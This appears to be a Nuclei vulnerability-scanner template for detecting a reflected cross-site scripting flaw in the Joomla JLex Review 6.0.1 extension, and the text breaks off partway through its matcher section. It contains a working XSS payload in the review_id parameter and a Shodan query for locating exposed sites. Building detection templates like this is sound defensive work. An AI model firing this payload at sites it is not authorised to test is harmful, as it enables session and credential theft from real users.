id: joomla-jlex-xss info: name: Joomla JLex Review 6.0.1 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. reference: - https://www.exploitalert.com/view-details.html?id=39732 - https://www.exploit-db.com/exploits/51645 - https://extensions.joomla.org/extension/jlex-review/ metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-1950415971 tags: joomla,xss http: - method: GET path: - "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1" matchers-condition: and matchers: - type: word part: body words: - '